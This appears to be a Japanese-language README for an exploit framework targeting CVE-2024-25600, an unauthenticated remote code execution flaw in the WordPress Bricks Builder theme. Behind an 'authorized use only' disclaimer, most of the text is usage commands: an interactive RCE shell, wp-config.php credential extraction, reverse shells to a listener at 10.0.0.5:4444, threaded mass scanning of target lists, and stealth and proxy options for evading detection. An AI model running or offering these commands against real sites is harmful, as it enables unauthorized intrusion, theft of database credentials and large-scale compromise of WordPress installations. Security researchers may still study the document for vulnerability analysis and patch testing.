
CVE-2024-25600 - WordPress Bricks Builderテーマ向けの未認証RCEエクスプロイト。インタラクティブシェル、リバースシェル、ファイルのアップロード/ダウンロード、非同期スキャン、ステルスモード、プロキシサポート、マルチスレッド脆弱性スキャンを備えた高度なエクスプロイトフレームワーク。認可されたセキュリティテスト専用です。
CVE-2024-25600 のための認可されたセキュリティ評価ツール
作成者: Sudeepa Wanigarathna · ツール: BricksRCE Exploiter v1.0
メインスクリプト: cve-2024-25600.py
[!IMPORTANT] 認可された使用のみ。 このツールは、セキュリティ研究、教育、および自分が所有するか、明示的な書面による許可を得たシステムのテストを目的としています。コンピュータシステムへの不正アクセスは違法です。作者は誤用に対する責任を負いません。
CVE-2024-25600 は、WordPress の Bricks Builder テーマにおける 重大な非認証リモートコード実行 脆弱性です。render_element REST エンドポイントにおけるユーザー制御入力の不適切な処理により、認証されていない攻撃者が影響を受けるインストール環境で任意の PHP / システムコマンドを実行できます。
BricksRCE Exploiter (cve-2024-25600.py) は、認可されたセキュリティ専門家が以下を行うためのフル機能の Python 評価ツールです:
| 属性 | 値 |
|---|---|
| CVE ID | CVE-2024-25600 |
| CVSS | 9.8 (Critical) |
| 攻撃ベクトル | ネットワーク — 認証不要 |
| 影響 | 完全なリモートコード実行、機密性 / 完全性 / 可用性の侵害 |
| 影響を受ける製品 | WordPress Bricks Builder テーマ |
| 影響を受けるバージョン | Bricks ≤ 1.9.6 (パッチ適用済み 1.9.6.1+) |
| 脆弱性タイプ | 非認証リモートコード実行 |
| CWE | CWE-94 (コード生成の不適切な制御) |
| エンドポイント | メソッド |
|---|---|
/wp-json/bricks/v1/render_element | POST |
/?rest_route=/bricks/v1/render_element | POST |
render_element リクエストを送信| 機能 | 説明 |
|---|---|
| 脆弱性検出 | 制御されたマーカーベースのプローブにより RCE を確認 |
| Nonce 抽出 | 複数の方法(スクリプト、ページソース、メタ、REST)での nonce 発見 |
| バージョン検出 | CSS / readme / REST から Bricks Builder バージョンを識別 |
| インタラクティブシェル | 履歴、オートコンプリート、ファイル転送機能を備えた完全な REPL |
| 単一コマンドモード | 1つのコマンドを実行して終了(スクリプト連携に適切) |
| リバースシェルヘルパー | bash / nc / Python / PHP / Perl / Ruby リバースシェルを生成 |
| wp-config 抽出 | wp-config.php の位置を特定し読み取りを試行 |
| 一括スキャン | URL リストからの非同期またはスレッド化マルチターゲットスキャン |
| 機能 | 説明 |
|---|---|
| レート制限 | リクエスト間の設定可能な遅延 |
| リトライロジック | タイムアウトや接続エラー時の指数バックオフ |
| User-Agent ローテーション | リクエストごとのランダムなブラウザフィンガープリント |
| ステルスモード | ランダム化された Accept-Language / Accept-Encoding ヘッダー |
| プロキシサポート | HTTP, HTTPS, SOCKS5 / SOCKS5h |
| デュアルエンドポイント | wp-json と rest_route の両方、または一方を優先 |
| フォースモード | 事前チェックをスキップし直接エクスプロイトを試行 |
| リッチ CLI | Rich ライブラリによるプログレスバー、テーブル、色付きパネル |
| 機能 | 説明 |
|---|---|
| JSON / TXT エクスポート | スキャン結果と脆弱なターゲットを保存 |
| コマンド履歴 | 実行されたコマンドのオプションログ |
| ファイルログ | 永続的な bricks_rce.log およびカスタムログパス |
pipgit clone https://github.com/CerberusMrXi/WP-Bricks-Exploit-CVE-2024-25600.git
cd WP-Bricks-Exploit-CVE-2024-25600
python3 -m venv venv
source venv/bin/activate # Windows: venv\Scripts\activate
pip install -r requirements.txt
python3 cve-2024-25600.py --help
requests>=2.31.0
aiohttp>=3.9.0
beautifulsoup4>=4.12.0
lxml>=4.9.0
prompt-toolkit>=3.0.0
rich>=13.7.0
pysocks>=1.7.0 # オプション — SOCKS5 プロキシサポート
https://target.exampleは ラボまたは認可された ターゲットのみに置き換えてください。
# インタラクティブシェル
python3 cve-2024-25600.py -u https://target.example
# 単一コマンド
python3 cve-2024-25600.py -u https://target.example --cmd "id"
# 一括スキャン
python3 cve-2024-25600.py -f targets.txt -t 20 -o results.json
# バージョン検出
python3 cve-2024-25600.py -u https://target.example --detect-version
# Burp プロキシ経由
python3 cve-2024-25600.py -u https://target.example --proxy http://127.0.0.1:8080 -v
すべての例はメインスクリプト
cve-2024-25600.pyを使用しています。
python3 cve-2024-25600.py --help
ターゲットが脆弱であることを確認した後、インタラクティブな RCE シェルを開きます。
python3 cve-2024-25600.py -u https://target.example
ワークフロー:
--force が指定されていない場合)python3 cve-2024-25600.py -u https://target.example --cmd "whoami"
コマンド出力をファイルに保存:
python3 cve-2024-25600.py -u https://target.example --cmd "id" --save-output
# デフォルトの PHP 例外ベースのペイロード
python3 cve-2024-25600.py -u https://target.example --cmd "uname -a" --payload php
# system() ベースのペイロード
python3 cve-2024-25600.py -u https://target.example --cmd "uname -a" --payload system
python3 cve-2024-25600.py -u https://target.example --detect-version
コマンドと組み合わせる:
python3 cve-2024-25600.py -u https://target.example --detect-version --cmd "id"
python3 cve-2024-25600.py -u https://target.example --extract-wp-config
成功すると wp-config_<ターゲット>.txt として保存されます。
# 端末 1 — リスナー
nc -lvnp 4444
# 端末 2 — bash リバースシェル
python3 cve-2024-25600.py -u https://target.example \
--reverse-shell bash \
--lhost 10.0.0.5 \
--lport 4444
サポートされているすべてのリバースシェルタイプ:
python3 cve-2024-25600.py -u https://target.example --reverse-shell bash --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell nc --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell python --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell php --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell perl --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell ruby --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --force --cmd "uname -a"
# targets.txt — 1行に1URL
python3 cve-2024-25600.py -f targets.txt
スレッド、遅延、ステルス、JSON 出力を指定:
python3 cve-2024-25600.py -f targets.txt \
-t 15 \
--delay 0.5 \
--stealth \
-o vulnerable.json
非同期ではなく同期(スレッドプール)スキャン:
python3 cve-2024-25600.py -f targets.txt --sync -t 10 -o results.txt
サイレント一括スキャン:
python3 cve-2024-25600.py -f targets.txt -q -o results.json
# 両方のエンドポイント (デフォルト)
python3 cve-2024-25600.py -u https://target.example --endpoint both
# /wp-json/bricks/v1/render_element のみ
python3 cve-2024-25600.py -u https://target.example --endpoint json
# /?rest_route=/bricks/v1/render_element のみ
python3 cve-2024-25600.py -u https://target.example --endpoint rest_route